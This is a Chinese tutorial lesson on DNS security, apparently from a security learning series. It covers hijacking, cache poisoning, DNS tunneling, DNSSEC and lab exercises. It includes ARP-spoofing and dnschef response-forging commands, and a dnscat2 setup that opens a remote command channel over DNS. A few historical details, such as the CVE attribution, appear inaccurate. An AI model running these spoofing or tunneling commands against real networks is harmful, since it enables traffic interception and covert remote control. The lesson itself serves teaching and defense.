公开文集
0x01 SRC 资产管理系统
0x02 Web 漏洞案例库
0x03 小程序漏洞案例库
第一章:小程序渗透基础
1.1 微信小程序反编译与动态调试
1.2 微信小程序强制开启开发者模式
0x99 信息安全学习体系
01-网络安全基础
Day-001-TCP-IP协议栈安全分析
Day-002-DNS协议安全与DNS劫持攻防
Day-003-IPv6 安全基础与过渡
Day-004-HTTP-HTTPS协议深度解析
Day-005-网络嗅探与流量分析技术
Day-006-防火墙原理与配置实践
Day-007-网络地址转换 NAT 安全分析
Day-008-路由协议安全 RIP-OSPF-BGP
Day-009-VLAN 安全与 VLAN-Hopping
Day-010-无线网络基础与安全 802.11
Day-011-网络访问控制 802.1X-NAC
Day-012-网络分段与微隔离设计
Day-013-负载均衡器安全配置
Day-014-CDN安全与防护
Day-015-NTP安全
Day-016-DHCP安全与攻击防护
Day-017-ICMP协议安全分析
Day-018-网络协议模糊测试基础
Day-019-网络流量基线建立
Day-020-网络取证基础
Day-021-网络入侵检测系统 NIDS
Day-022-网络入侵防御系统 NIPS
Day-023-网络流量加密与解密
Day-024-网络协议逆向工程基础
Day-025-网络性能与安全权衡
Day-026-SDN 安全
Day-027-网络虚拟化安全
Day-028-网络欺骗技术
Day-029-网络威胁情报应用
Day-030-网络容量规划与安全
Day-031-网络安全架构设计实战
02-Web 安全
Day-032-OWASP-Top-10-2021详解
Day-033-SQL 注入原理与手工检测
Day-034-SQL注入进阶报错注入与盲注
Day-035-XSS跨站脚本攻击基础
Day-036-XSS 进阶绕过与利用
Day-037-XSS进阶绕过与利用
Day-038-CSRF 跨站请求伪造
Day-039-文件上传漏洞
Day-040-反序列化漏洞基础
Day-041-PHP反序列化深入
Day-042-Java反序列化深入
Day-043-SSTI 服务端模板注入
Day-044-文件包含漏洞 LFI-RFI
Day-045-命令注入漏洞
Day-046-XXE-XML 外部实体注入
Day-047-反序列化漏洞进阶
Day-048-API 安全基础
Day-049-API认证与授权安全
Day-050-API漏洞挖掘实战
Day-051-文件上传漏洞进阶
Day-052-反序列化漏洞实战
Day-053-Web 安全综合实战
Day-054-移动安全基础
Day-055-Android 应用安全测试
Day-056-iOS 应用安全测试
Day-057-移动应用综合实战
Day-058-云安全基础
Day-059-AWS 安全实战
Day-060-Azure 安全实战
Day-061-GCP 安全实战
Day-062-云安全综合实战
Day-063-容器安全基础
Day-064-Docker 安全实战
Day-065-Kubernetes 安全实战
Day-066-容器安全综合实战
Day-067-API 安全进阶
Day-068-服务端请求伪造 SSRF 深入
Day-069-文件上传漏洞进阶
Day-070-反序列化漏洞实战进阶
Day-071-业务逻辑漏洞深入
Day-072-前端安全深入
Day-073-Web 安全综合实战
Day-074-云安全进阶
Day-075-移动安全进阶
Day-076-API 安全进阶
Day-077-前端安全进阶
Day-078-业务逻辑漏洞进阶
Day-079-反序列化漏洞实战进阶
Day-080-文件上传漏洞实战进阶
Day-081-SSTI 服务端模板注入进阶
Day-082-XXE-XML 外部实体注入进阶
Day-083-SSRF 服务端请求伪造进阶
Day-084-命令注入漏洞进阶
Day-085-文件包含漏洞进阶
Day-086-反序列化漏洞实战进阶
Day-087-文件上传漏洞实战进阶
Day-088-SSTI 服务端模板注入实战进阶
Day-089-XXE-XML 外部实体注入实战进阶
Day-090-SSRF 服务端请求伪造实战进阶
Day-091-命令注入漏洞实战进阶
Day-092-Web 安全综合实战
Day-093-GraphQL 安全
Day-094-JWT 与 OAuth2 安全
03-系统安全
Day-095-系统监控与检测
Day-096-主机防火墙配置
Day-097-系统审计与合规
Day-098-Linux 系统安全进阶
Day-099-Windows 系统安全进阶
Day-100-容器安全进阶
Day-101-容器编排安全进阶
Day-102-Linux 内核安全
Day-103-Windows 内核安全
Day-104-系统安全总结与实战
Day-105-Linux 系统安全基础
Day-106-Windows 系统安全基础
Day-107-容器安全基础
Day-108-系统加固技术
Day-109-日志分析技术
Day-110-威胁狩猎技术
04-应用安全
Day-111-安全编码规范
Day-112-输入验证技术
Day-113-输出编码技术
Day-114-错误处理安全
Day-115-会话管理安全
Day-116-认证安全
Day-117-授权安全
Day-118-数据保护安全
Day-119-日志安全
Day-120-API 安全
Day-121-微服务安全
Day-122-新兴技术安全概论
Day-123-DevSecOps 流水线安全
Day-124-云原生安全架构
Day-125-API 安全最佳实践
Day-126-安全编码规范
Day-127-SDL 安全开发生命周期
Day-128-威胁建模实战
Day-129-安全需求分析
Day-130-安全架构设计
Day-131-安全编码实践Java
Day-132-安全编码实践Python
Day-133-代码审计方法论
Day-134-静态代码分析SAST
Day-135-动态应用测试DAST
Day-136-交互式测试IAST
Day-137-软件成分分析SCA
Day-138-依赖漏洞管理
Day-139-安全测试自动化
Day-140-漏洞管理与响应
Day-142-OWASP-Top10-2024 详解
Day-143-CWE-Top25 分析
Day-144-漏洞挖掘方法论
Day-145-模糊测试技术
Day-146-逆向工程基础
Day-147-漏洞利用开发基础
Day-148-漏洞复现与验证
Day-149-漏洞披露流程
Day-150-CVE 申请与管理
Day-151-漏洞赏金计划
Day-152-等保2.0详解
Day-153-GDPR 合规实践
Day-154-数据安全法解读
Day-155-个人信息保护法与合规指南
Day-156-个人信息保护法解读
Day-157-ISO-27001 信息安全管理体系
Day-158-SOC-2 合规与审计
Day-159-PCI-DSS 支付卡行业数据安全标准
Day-160-网络安全审查办法解读
Day-161-数据出境安全评估办法
Day-162-应用安全评估实战
Day-163-红蓝对抗演练
Day-164-安全应急响应
Day-165-安全运营中心建设
Day-166-应用安全总结与展望
05-密码学
Day-167-密码学基础
Day-168-对称加密算法详解
Day-169-非对称加密算法详解
Day-170-哈希函数与数字签名
Day-171-密钥管理与PKI
Day-172-TLS-SSL 协议详解
Day-173-国密算法详解
Day-174-认证与密钥协议
Day-175-随机数生成与熵源
Day-176-椭圆曲线密码学详解
Day-177-后量子密码学详解
Day-178-高级密码学主题
Day-179-密码学行业应用精选
Day-180-常用加密算法原理与实现
Day-181-密码学总结与展望
06-渗透测试
Day-183-渗透测试方法论
Day-184-信息收集技术详解
Day-185-漏洞扫描技术详解
Day-186-漏洞利用技术详解
Day-187-渗透测试中的漏洞利用框架
Day-188-漏洞利用框架与 Metasploit 深入
Day-189-渗透测试中的 WAF 绕过技术
Day-190-渗透测试中的模糊测试技术
Day-191-渗透测试中的代码审计与静态分析
Day-192-渗透测试中的密码哈希破解技术
Day-193-渗透测试报告编写指南
Day-194-Web 应用渗透测试
Day-195-渗透测试中的 API 安全测试
Day-196-渗透测试中的 GraphQL 安全测试
Day-197-渗透测试中的前后端分离应用测试
Day-198-渗透测试中的小程序安全测试
Day-199-渗透测试中的浏览器安全测试
Day-200-OAuth-SSO安全测试
Day-201-渗透测试中的业务逻辑漏洞测试
Day-202-渗透测试中的厚客户端安全测试
Day-203-渗透测试综合实战演练
Day-204-内网渗透技术详解
Day-205-渗透测试中的内网信息收集进阶
Day-206-渗透测试中的域森林渗透技术
Day-207-渗透测试中的权限维持技术
Day-208-渗透测试中的横向移动技术
Day-209-渗透测试中的痕迹清理与反取证技术
Day-210-渗透测试中的数据窃取与 Exfiltration 技术
Day-211-渗透测试中的内部威胁与数据泄露测试
Day-212-渗透测试中的物理安全渗透
Day-213-社会工程学攻击技术
Day-214-移动应用渗透测试
Day-215-云安全渗透测试
Day-216-渗透测试中的容器与 Kubernetes 安全渗透
Day-217-渗透测试中的 Serverless 安全测试
Day-218-渗透测试中的微服务安全测试
Day-219-物联网安全渗透测试
Day-220-工业控制系统安全渗透测试
Day-221-无线网络安全渗透测试
Day-222-数据库安全渗透测试
Day-223-渗透测试中的供应链安全测试
Day-224-红队演练技术详解
Day-225-渗透测试中的红队基础设施搭建
Day-226-渗透测试中的威胁情报与狩猎
Day-227-渗透测试中的综合指纹识别技术
Day-228-自动化渗透测试技术
Day-229-渗透测试中的运维安全测试
Day-230-渗透测试中的区块链与智能合约安全测试
Day-231-渗透测试中的漏洞管理与修复验证
Day-232-渗透测试法律与合规
Day-233-后渗透攻击技术详解
Day-234-渗透测试中的人工智能应用
Day-235-漏洞利用开发深入
Day-236-云原生渗透测试深入
07-应急响应
Day-237-应急响应概述与核心概念
Day-238-应急响应流程框架
Day-239-CSIRT 团队组建与职责分工
Day-240-应急响应工具包准备
Day-241-应急响应法律与合规要求
Day-242-安全事件检测方法与指标
Day-243-云原生应急响应
Day-244-日志收集与分析技术
Day-245-网络流量分析与异常识别
Day-246-自动化响应与 SOAR
Day-247-端点监控与 EDR 技术
Day-248-威胁狩猎方法论
Day-249-威胁情报在检测中的应用
Day-250-数字取证基础与证据链管理
Day-251-内存取证技术
Day-252-磁盘取证与文件恢复
Day-253-网络取证与数据包分析
Day-254-云环境与容器取证
Day-255-恶意代码静态分析技术
Day-256-恶意代码动态分析技术
Day-257-恶意代码行为分析方法
Day-258-逆向工程基础与工具
Day-259-沙箱技术与自动化分析
Day-260-事件隔离与遏制策略
Day-261-威胁根除与系统修复
Day-262-系统恢复与数据重建
Day-263-业务连续性计划
Day-264-事件复盘与经验总结
Day-265-APT 攻击事件复盘分析
Day-266-勒索软件事件响应实战
Day-267-数据泄露事件处置流程
Day-268-内部威胁调查与取证
Day-269-综合应急响应演练
08-安全运维
Day-270-安全运营中心 SOC 概述
Day-271-安全监控指标体系
Day-272-安全告警管理
Day-273-安全可视化与仪表盘
Day-274-监控工具选型
Day-275-日志采集技术
Day-276-日志标准化与解析
Day-277-日志存储与归档
Day-278-日志分析技术
Day-279-日志合规要求
Day-280-SIEM 架构与设计
Day-281-关联规则引擎
Day-282-高级关联分析
Day-283-UEBA 用户实体行为分析
Day-284-威胁狩猎
Day-285-SOAR 基础概念
Day-286-剧本设计
Day-287-自动化响应技术
Day-288-安全工具集成
Day-289-SOAR 度量与优化
Day-290-安全基线管理
Day-291-漏洞管理流程
Day-292-补丁管理策略
Day-293-变更安全管理
Day-294-合规审计技术
Day-295-7x24 安全运营
Day-296-安全事件管理流程
Day-297-安全运营度量体系
Day-298-持续改进机制
Day-299-安全运维综合演练
Day-300-云原生安全运营
Day-301-AI 与机器学习安全运营
Day-302-安全自动化脚本实战
09-移动安全
Day-303-移动安全威胁概述
Day-304-移动设备安全架构
Day-305-移动操作系统安全模型
Day-306-移动应用权限管理
Day-307-移动端数据加密
Day-308-330-Android 安全合集
Day-309-Android 安全架构
Day-310-Android 组件安全
Day-311-Android 权限与隐私
Day-312-Android 逆向工程
Day-313-Android 应用加固
Day-314-iOS 安全架构
Day-315-iOS 应用沙盒机制
Day-316-越狱与反越狱
Day-317-iOS 逆向工程
Day-318-iOS 企业分发安全
Day-319-移动安全开发生命周期
Day-320-移动应用安全测试
Day-321-移动应用加固技术
Day-322-移动威胁防护
Day-323-移动安全合规
10-云安全
Day-324-云计算安全模型
Day-325-责任共担模型
Day-326-云安全威胁模型
Day-327-云安全合规框架
Day-328-云安全架构设计
Day-329-AWS IAM 安全
Day-330-AWS 网络安全
Day-331-AWS 存储安全
Day-332-AWS 安全监控
Day-333-AWS 安全最佳实践
Day-334-Azure AD 安全
Day-335-Azure 网络安全
Day-336-Azure 存储安全
Day-337-Azure 安全中心
Day-338-Azure 安全最佳实践
Day-339-容器安全基础
Day-340-Kubernetes 安全
Day-341-Serverless 安全
Day-342-云原生 DevSecOps
Day-343-云安全态势管理 CSPM
11-物联网工控
Day-344-物联网安全概述
Day-345-IoT 通信协议安全
Day-346-IoT 设备安全
Day-347-IoT 平台安全
Day-348-IoT 应用安全
Day-349-工业控制系统概述
Day-350-工控协议安全
Day-351-PLC 安全
Day-352-SCADA 系统安全
Day-353-工控安全防护
12-综合与总结
Day-354-安全职业发展路径
Day-355-安全技术趋势展望
Day-356-安全建设方法论
Day-357-经典攻防案例复盘
Day-358-安全学习资源指南
Day-359-信息安全行业求职指南
-
+
首页
Day-002-DNS协议安全与DNS劫持攻防
# Day 02: DNS 协议安全与 DNS 劫持攻防 > 网络安全系列第 2 天 | 预计阅读时间:30 分钟 | 难度:★★★★☆ --- ## 清单 目录 1. [DNS 基础回顾](#dns 基础回顾) 2. [DNS 安全威胁全景](#dns 安全威胁全景) 3. [DNS 劫持技术深度分析](#dns 劫持技术深度分析) 4. [DNSSEC 原理与部署](#dnssec 原理与部署) 5. [实验环境搭建](#实验环境搭建) 6. [实战演练](#实战演练) 7. [企业级 DNS 安全架构](#企业级 dns 安全架构) 8. [总结与思考](#总结与思考) 9. [参考资料](#参考资料) --- ## DNS 基础回顾 ### DNS 的重要性 DNS(Domain Name System,域名系统)是互联网的"电话簿",将人类可读的域名(如 www.google.com)转换为机器可读的 IP 地址(如 142.250.185.68)。 **没有 DNS 的互联网**: - 用户需要记住每个网站的 IP 地址 - 网站迁移服务器需要通知所有用户 - 负载均衡和 CDN 无法实现 - 电子邮件系统无法正常工作 ### DNS 工作原理 #### 查询流程 ``` 用户输入:www.example.com 1. 本地缓存检查 └─→ 有记录?直接返回 2. 递归解析器查询 └─→ 向根服务器查询 .com 3. TLD 服务器查询 └─→ 向 .com 服务器查询 example.com 4. 权威服务器查询 └─→ 向 example.com 权威服务器查询 www 5. 返回结果并缓存 └─→ 93.184.216.34 ``` #### DNS 消息格式 ``` ┌─────────────────────────────────────┐ │ Header (12 bytes) │ │ ID | QR | OPCODE | AA | TC | RD... │ ├─────────────────────────────────────┤ │ Question Section │ │ QNAME | QTYPE | QCLASS │ ├─────────────────────────────────────┤ │ Answer Section │ │ NAME | TYPE | CLASS | TTL | RDLENGTH│ ├─────────────────────────────────────┤ │ Authority Section (可选) │ ├─────────────────────────────────────┤ │ Additional Section (可选) │ └─────────────────────────────────────┘ ``` ### DNS 记录类型 | 记录类型 | 代码 | 用途 | 示例 | |----------|------|------|------| | A | 1 | IPv4 地址 | www → 93.184.216.34 | | AAAA | 28 | IPv6 地址 | www → 2606:2800:220:1:248:1893:25c8:1946 | | CNAME | 5 | 别名 | blog → www.example.com | | MX | 15 | 邮件交换 | mail → mail.example.com | | NS | 2 | 名称服务器 | → ns1.example.com | | TXT | 16 | 文本记录 | SPF、DKIM 验证 | | SOA | 6 | 起始授权 | 区域信息 | | PTR | 12 | 反向解析 | IP → 域名 | --- ## DNS 安全威胁全景 ### 威胁分类 ``` DNS 安全威胁 ├── 欺骗类攻击 │ ├── DNS 缓存投毒 │ ├── DNS 响应伪造 │ └── DNS 劫持 ├── 拒绝服务攻击 │ ├── DNS 查询洪水 │ ├── DNS 反射放大 │ └── 域名锁定 ├── 信息泄露 │ ├── DNS 隧道 │ ├── 枚举攻击 │ └── 查询监听 └── 配置滥用 ├── 开放解析器 ├── 区域传输泄露 └── 动态更新滥用 ``` ### 攻击影响评估 | 攻击类型 | 影响范围 | 恢复难度 | 发生频率 | |----------|----------|----------|----------| | DNS 劫持 | 全局 | 高 | 中 | | 缓存投毒 | 局部 | 中 | 低 | | DDoS 攻击 | 服务中断 | 低 | 高 | | DNS 隧道 | 数据泄露 | 中 | 中 | --- ## DNS 劫持技术深度分析 ### 劫持类型详解 #### 1. 本地 DNS 劫持 **攻击场景**: - 恶意软件修改 hosts 文件 - 路由器 DNS 设置被篡改 - 本地 DNS 缓存污染 **hosts 文件位置**: ``` Windows: C:\Windows\System32\drivers\etc\hosts Linux: /etc/hosts macOS: /etc/hosts ``` **示例**: ``` # 正常 hosts # 93.184.216.34 www.example.com # 被篡改后 1.2.3.4 www.example.com 1.2.3.4 www.bank.com ``` **检测与清除**: ```bash # Linux/macOS 检查 hosts cat /etc/hosts | grep -v "^#" | grep -v "^$" # Windows 检查 hosts type C:\Windows\System32\drivers\etc\hosts # 清除本地 DNS 缓存 # Windows ipconfig /flushdns # Linux (systemd-resolved) systemd-resolve --flush-caches # macOS sudo dscacheutil -flushcache sudo killall -HUP mDNSResponder ``` #### 2. 路由器 DNS 劫持 **攻击原理**: 攻击者利用路由器漏洞或弱密码,修改 DNS 服务器设置,将所有用户的 DNS 查询重定向到恶意服务器。 **历史案例**: - 2018 年:Cisco、Linksys 等路由器漏洞(CVE-2018-0171) - 影响:超过 30 万台设备 - 后果:用户被重定向到钓鱼网站 **防护措施**: ```bash # 检查当前 DNS 设置 # Windows ipconfig /all | findstr "DNS" # Linux cat /etc/resolv.conf # 路由器管理界面检查 # 登录路由器 → WAN 设置 → DNS 服务器 # 应设置为可信 DNS(如 8.8.8.8, 1.1.1.1) ``` #### 3. ISP DNS 劫持 **攻击原理**: 互联网服务提供商(ISP)在 DNS 解析过程中插入广告或重定向页面。 **常见表现**: - 输入不存在的域名显示广告页面 - 正常网站被插入广告 - HTTPS 证书警告 **检测方法**: ```bash # 使用多个 DNS 服务器对比结果 dig @8.8.8.8 example.com dig @1.1.1.1 example.com dig @208.67.222.222 example.com # 如果结果不一致,可能存在劫持 # 检查 NXDOMAIN 响应 dig @your-isp-dns nonexistent-domain-12345.com # 正常应返回 NXDOMAIN # 劫持可能返回 A 记录(广告页面) ``` #### 4. 中间人 DNS 劫持 **攻击原理**: 攻击者在网络中截获 DNS 请求,返回伪造的响应。 **技术要求**: - 网络位置优势(同一局域网) - ARP 欺骗能力 - 快速响应(在真实响应之前) **工具演示**(仅用于学习): ```bash # Kali Linux DNS 欺骗工具 # 1. 启用 IP 转发 echo 1 > /proc/sys/net/ipv4/ip_forward # 2. 配置 dnschef dnschef --fakeip example.com=192.168.1.100 \ --interface eth0 \ --gateway 192.168.1.1 # 3. 配合 ARP 欺骗 arpspoof -i eth0 -t victim gateway ``` ### DNS 缓存投毒(DNS Cache Poisoning) #### 攻击原理 ``` 正常流程: 1. 客户端 → 递归解析器:www.example.com? 2. 递归解析器 → 权威服务器:www.example.com? 3. 权威服务器 → 递归解析器:93.184.216.34 4. 递归解析器 → 客户端:93.184.216.34 5. 递归解析器缓存结果 投毒流程: 1. 客户端 → 递归解析器:www.example.com? 2. 攻击者监听查询 3. 攻击者 → 递归解析器:伪造响应(在真实响应前) 4. 递归解析器接受伪造响应并缓存 5. 后续所有查询都被污染 ``` #### Kaminsky 攻击(2008 年) **历史意义**:最严重的 DNS 漏洞之一,影响几乎所有 DNS 服务器 **技术细节**: - 利用 16 位事务 ID(65536 种可能) - 利用 16 位源端口(理论 65536,实际更少) - 暴力猜测组合:65536 × 65536 = 4,294,967,296 - 但实际可在数小时内破解 **修复方案**: - 随机化源端口(RFC 6056) - 增加事务 ID 熵 - 部署 DNSSEC #### 实战检测 ```bash # 检查 DNS 缓存 # Windows ipconfig /displaydns # 查看特定域名缓存 nslookup www.example.com # 检查是否被污染 # 对比多个公共 DNS dig @8.8.8.8 example.com +short dig @1.1.1.1 example.com +short dig @9.9.9.9 example.com +short # 如果结果差异大,可能被污染 ``` ### DNS 隧道(DNS Tunneling) #### 原理与应用 **合法用途**: - 绕过网络限制 - 内网穿透 - 备用通信通道 **恶意用途**: - 数据外泄 - C2 通信 - 绕过防火墙 #### 技术实现 ``` 正常 DNS 查询: www.example.com → A 记录 → 93.184.216.34 DNS 隧道编码: [Base64 数据].tunnel.example.com → TXT 记录 → [响应数据] 示例: c2VjcmV0ZGF0YQ==.tunnel.example.com 解码:secretdata ``` #### 检测技术 ```bash # 1. 监控异常 DNS 流量 # 长域名查询(> 50 字符) tcpdump -i eth0 'udp port 53 and dst host <dns_server>' # 2. 使用 dnscat2 检测 # 安装 git clone https://github.com/iagox86/dnscat2.git # 3. 分析查询频率 # 正常:间歇性查询 # 隧道:持续高频查询 # 4. 检查熵值 # 高熵子域名可能是编码数据 ``` #### 防护策略 ```bash # 1. DNS 防火墙规则 # 限制查询速率 rate-limit 5/second # 2. 域名长度限制 # 拒绝超长域名查询 # 3. 监控异常模式 # 使用 SIEM 分析 DNS 日志 # 4. 阻止已知隧道工具域名 # 更新威胁情报 feed ``` --- ## DNSSEC 原理与部署 ### DNSSEC 是什么? **DNSSEC(DNS Security Extensions)** 是为 DNS 添加加密签名的安全扩展,提供: - + **数据完整性**:确保响应未被篡改 - + **数据来源认证**:确保响应来自权威服务器 - + **否认存在证明**:证明域名确实不存在 - - **不提供机密性**:数据仍然明文传输 - - **不防 DDoS**:不防止拒绝服务攻击 ### DNSSEC 工作原理 #### 信任链(Chain of Trust) ``` 根区域 (.) ↓ 签名 TLD (.com) ↓ 签名 权威域 (example.com) ↓ 签名 子域 (www.example.com) ``` #### 关键记录类型 | 记录 | 全称 | 用途 | |------|------|------| | DNSKEY | DNS Key | 存储公钥 | | RRSIG | Resource Record Signature | 资源记录签名 | | DS | Delegation Signer | 委派签名者(链接上下级) | | NSEC | Next Secure | 证明域名不存在 | | NSEC3 | Next Secure v3 | NSEC 的改进版(防枚举) | #### 签名验证流程 ``` 1. 客户端请求 www.example.com 2. 递归解析器获取: - A 记录:93.184.216.34 - RRSIG 记录:A 记录的签名 3. 获取 DNSKEY 记录(公钥) 4. 使用公钥验证 RRSIG 5. 验证 DS 记录(链接到父区域) 6. 一直验证到根区域(信任锚) 7. 验证通过,返回结果 ``` ### DNSSEC 部署指南 #### 1. 域名注册商配置 ``` 步骤: 1. 登录域名管理控制台 2. 找到 DNSSEC 设置 3. 获取 DS 记录信息 4. 在注册商处提交 DS 记录 ``` #### 2. BIND9 配置 ```bash # 安装 BIND9 apt install bind9 bind9utils bind9-doc # 生成密钥 cd /etc/bind dnssec-keygen -a RSASHA256 -b 2048 -n ZONE example.com # 生成:Kexample.com.+008+12345.key 和 .private # 签名区域 dnssec-signzone -A -3 $(head -c 100 /dev/random | sha1sum | cut -b 1-16) \ -N INCREMENT -o example.com -t /etc/bind/db.example.com # 配置 named.conf zone "example.com" { type master; file "/etc/bind/db.example.com.signed"; auto-dnssec maintain; inline-signing yes; }; # 重启服务 systemctl restart bind9 ``` #### 3. 验证部署 ```bash # 检查 DNSSEC dig @8.8.8.8 example.com +dnssec # 查看签名记录 dig @8.8.8.8 example.com DNSKEY dig @8.8.8.8 example.com DS # 验证链 dig +trace +dnssec example.com # 使用在线工具 # https://dnsviz.net/ # https://www.internetsociety.org/deploy360/dnssec/ ``` ### DNSSEC 的局限性 1. **部署复杂**:需要各级域名服务器配合 2. **密钥管理**:需要定期轮换密钥 3. **响应大小**:签名增加响应大小(可能触发 UDP 分片) 4. **不加密数据**:仍可能被监听 5. **根依赖**:依赖根服务器的信任锚 --- ## 实验环境搭建 ### 环境架构 ``` ┌─────────────────────────────────────────────────────┐ │ 隔离网络 │ │ 192.168.56.0/24 │ │ │ │ ┌──────────────┐ ┌──────────────┐ │ │ │ Kali Linux │ │ Ubuntu DNS │ │ │ │ 192.168.56.101│ │ 192.168.56.102│ │ │ │ (攻击机) │ │ (目标 DNS) │ │ │ └──────────────┘ └──────────────┘ │ │ │ │ │ │ └────────┬───────────┘ │ │ │ │ │ ┌───────▼───────┐ │ │ │ Victim Client │ │ │ │ 192.168.56.103 │ │ │ └───────────────┘ │ └─────────────────────────────────────────────────────┘ ``` ### 工具准备 ```bash # Kali Linux 预装工具 # - dnsrecon: DNS 侦察 # - dnsenum: DNS 枚举 # - fierce: DNS 扫描 # - dnscat2: DNS 隧道 # - dnschef: DNS 代理 # 目标机安装 BIND9 apt update apt install bind9 bind9utils dnsutils # 验证安装 named -v dig -v ``` --- ## 实战演练 ### 实验 1: DNS 信息收集 **目的**:学习 DNS 侦察技术 **步骤**: ```bash # 1. 基础查询 dig example.com dig example.com ANY dig @8.8.8.8 example.com # 2. 查询名称服务器 dig example.com NS dig example.com SOA # 3. 查询邮件服务器 dig example.com MX # 4. 区域传输测试(多数已禁用) dig @ns1.example.com example.com AXFR # 5. 使用 dnsrecon dnsrecon -d example.com -t std # 6. 使用 dnsenum dnsenum example.com # 7. 子域名枚举 dnsrecon -d example.com -t brt -w /usr/share/wordlists/dns/subdomains.txt ``` **预期输出**: ``` DNS Records for example.com: A www 93.184.216.34 MX mail 10 mail.example.com NS ns1 ns1.example.com NS ns2 ns2.example.com TXT @ "v=spf1 include:_spf.example.com ~all" ``` ### 实验 2: DNS 缓存投毒演示(隔离环境) ! **警告**:仅在完全隔离环境进行 **步骤**: ```bash # 1. 在目标 DNS 服务器配置 # /etc/bind/named.conf.options options { recursion yes; allow-recursion { 192.168.56.0/24; }; }; # 2. 攻击机准备 # 监听 DNS 请求 tcpdump -i eth0 -n port 53 # 3. 使用 dnschef 伪造响应 dnschef --fakeip example.com=192.168.56.200 \ --interface eth0 # 4. 受害者查询 nslookup example.com # 5. 验证结果 # 应返回 192.168.56.200(伪造) ``` ### 实验 3: DNS 隧道搭建 **目的**:理解 DNS 隧道原理 **服务端配置**: ```bash # 1. 安装 dnscat2 git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server gem install bundler bundle install # 2. 启动服务器 ruby dnscat2.rb example.com -e open --no-cache # 3. 配置 DNS 服务器 # 将 example.com 的权威 DNS 指向攻击者服务器 ``` **客户端连接**: ```bash # 1. 编译客户端 cd dnscat2/client make # 2. 连接服务器 ./dnscat --dns example.com # 3. 建立隧道后可执行命令 # 文件传输、端口转发等 ``` **检测方法**: ```bash # 监控异常 DNS 流量 tcpdump -i eth0 -n 'udp port 53' -w dns_traffic.pcap # 分析流量模式 # - 查询频率异常高 # - 子域名长度异常 # - 熵值异常高 ``` ### 实验 4: DNSSEC 配置与验证 **步骤**: ```bash # 1. 在 BIND9 启用 DNSSEC # /etc/bind/named.conf.options dnssec-validation auto; # 2. 生成密钥 cd /etc/bind dnssec-keygen -a RSASHA256 -b 2048 -n ZONE test.local # 3. 签名区域 dnssec-signzone -o test.local /etc/bind/db.test.local # 4. 更新配置 zone "test.local" { type master; file "/etc/bind/db.test.local.signed"; }; # 5. 重启 BIND systemctl restart bind9 # 6. 验证 dig @localhost test.local +dnssec dig @localhost test.local DNSKEY # 7. 使用在线验证 # https://dnsviz.net/d/test.local/dnssec/ ``` --- ## 企业级 DNS 安全架构 ### 分层 DNS 架构 ``` ┌─────────────────────────────────────────┐ │ 外部 DNS 层 │ │ (面向互联网,DDoS 防护) │ │ ┌─────────┐ ┌─────────┐ │ │ │ Anycast │ │ Anycast │ │ │ │ DNS-1 │ │ DNS-2 │ │ │ └─────────┘ └─────────┘ │ └─────────────────────────────────────────┘ ↓ ┌─────────────────────────────────────────┐ │ 内部 DNS 层 │ │ (递归解析,缓存) │ │ ┌─────────┐ ┌─────────┐ │ │ │Recursive│ │Recursive│ │ │ │ DNS-1 │ │ DNS-2 │ │ │ └─────────┘ └─────────┘ │ └─────────────────────────────────────────┘ ↓ ┌─────────────────────────────────────────┐ │ 权威 DNS 层 │ │ (内部域,Split-Horizon) │ │ ┌─────────┐ ┌─────────┐ │ │ │ Authori │ │ Authori │ │ │ │ -1 │ │ -2 │ │ │ └─────────┘ └─────────┘ │ └─────────────────────────────────────────┘ ``` ### 安全配置清单 #### 1. BIND9 安全加固 ```bash # /etc/bind/named.conf.options options { # 版本隐藏 version "not disclosed"; # 限制查询 allow-query { trusted-nets; }; allow-recursion { trusted-nets; }; # 速率限制 rate-limit { responses-per-second 5; window 5; }; # DNSSEC dnssec-validation auto; # 日志 querylog yes; }; # 访问控制列表 acl "trusted-nets" { 192.168.0.0/16; 10.0.0.0/8; }; ``` #### 2. 监控与告警 ```bash # DNS 查询日志分析 # /var/log/named/query.log # 使用 ELK Stack 分析 # 1. Filebeat 收集日志 # 2. Logstash 处理 # 3. Elasticsearch 存储 # 4. Kibana 可视化 # 关键指标监控 - 查询量突增(DDoS 指示) - NXDOMAIN 比例异常(枚举攻击) - 异常查询模式(隧道检测) - 响应时间增加(性能问题) ``` #### 3. 备份与恢复 ```bash # 定期备份区域文件 # /etc/cron.daily/dns-backup #!/bin/bash tar -czf /backup/dns-$(date +%Y%m%d).tar.gz /etc/bind rsync -av /backup/dns-*.tar.gz backup-server:/dns-backup/ # 测试恢复流程 # 定期演练区域文件恢复 # 验证备份完整性 ``` ### 云 DNS 服务对比 | 服务商 | 产品 | DDoS 防护 | DNSSEC | 价格 | |--------|------|-----------|--------|------| | AWS | Route 53 | ✓ | ✓ | $0.40/百万查询 | | Cloudflare | DNS | ✓ | ✓ | 免费 | | Google | Cloud DNS | ✓ | ✓ | $0.20/百万查询 | | Azure | DNS | ✓ | ✓ | $0.40/百万查询 | | 阿里云 | 云解析 DNS | ✓ | ✓ | 免费/付费 | --- ## 总结与思考 ### 核心要点回顾 1. **DNS 是互联网关键基础设施**,也是重要攻击目标 2. **主要威胁**: - DNS 劫持(本地、路由器、ISP、中间人) - 缓存投毒(Kaminsky 攻击) - DNS 隧道(数据外泄) - DDoS 攻击(反射放大) 3. **DNSSEC 提供完整性验证**,但部署复杂 4. **企业需要分层 DNS 架构**,结合监控和备份 ### 深入思考问题 1. **DoH/DoT 是否解决了 DNS 安全问题?** - 优点:加密传输,防监听和篡改 - 缺点:集中化风险,绕过企业 DNS 策略 - 争议:隐私 vs 管理 2. **DNS over HTTPS (DoH) 的影响**: ``` 传统 DNS: 客户端 → 企业 DNS → 互联网 DoH: 客户端 → Cloudflare/Google → 互联网 企业失去: - 内部域名解析 - 安全策略执行 - 查询日志审计 ``` 3. **区块链 DNS 的可行性**: - Handshake, Namecoin, ENS - 去中心化,抗审查 - 但面临采用率和监管挑战 ### 实战建议 1. **个人用户**: - 使用可信 DNS(1.1.1.1, 8.8.8.8) - 检查路由器 DNS 设置 - 启用 DNSSEC 验证 2. **企业用户**: - 部署分层 DNS 架构 - 实施 DNS 监控和日志分析 - 定期安全审计和渗透测试 - 制定 DNS 应急响应预案 3. **域名管理员**: - 启用 DNSSEC - 配置 SPF、DKIM、DMARC - 监控域名状态和 DNS 记录 - 锁定域名防止转移 ### 下一步学习建议 - **深入 DNS 协议**:阅读 RFC 1035, RFC 2181, RFC 4035 - **实践 DNS 安全工具**:dnsrecon, dnscat2, DNSViz - **学习 DoH/DoT**:理解新一代 DNS 协议 - **研究 DNS 威胁情报**:跟踪 DNS 相关攻击活动 --- ## 参考资料 ### 标准文档 - RFC 1035 - 